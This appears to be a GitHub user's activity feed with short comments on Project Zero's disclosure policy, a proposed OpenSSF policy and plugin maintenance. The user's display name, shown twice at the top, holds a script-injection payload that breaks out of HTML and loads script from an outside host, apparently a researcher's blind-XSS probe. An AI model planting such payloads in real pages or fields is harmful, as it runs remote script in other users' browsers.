Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
> How does Project Zero’s policy apply to open-source projects? The verbiage in the policy and FAQ seems specifically targeted at vendors and “patches”. As far as I can tell,...
I agree, but that should be broken out into an independent issue dedicated to that topic specifically. While those two problems look to be the same, they really aren't unfortunately.
What do you mean by ambiguous? What wording do you think has this characteristic? AFAIK, they don't have a specific policy that's different for OSS. From what I've heard, they...
Please see the proposed policy and leave any review comments: https://docs.google.com/document/d/1W2Xfw9i5pSA-0XbIw3a4kcW2o4PByxDbjcnWe9mlQwA/edit?usp=sharing
Submitted to the TAC: https://github.com/ossf/tac/issues/149
Submitted to the LF Legal team for review: (internal/private link): https://legaljira.linuxfoundation.org/servicedesk/customer/portal/1/LR-1447
> We have temporarily removed the Safe Habor section because the Linux Foundation Counsel advised that the text as written has serious problems. We need to find a solution to...
Solid find and a good candidate!
Hey @PaulFridrick this would technically be an API breaking change. If we're going to make this change, it will need to be documented in the release notes.
Unfortunately, there are very little plans with this plugin currently. We do plan to continue to maintain it. We use it internally, however, it's not a priority. > Even master...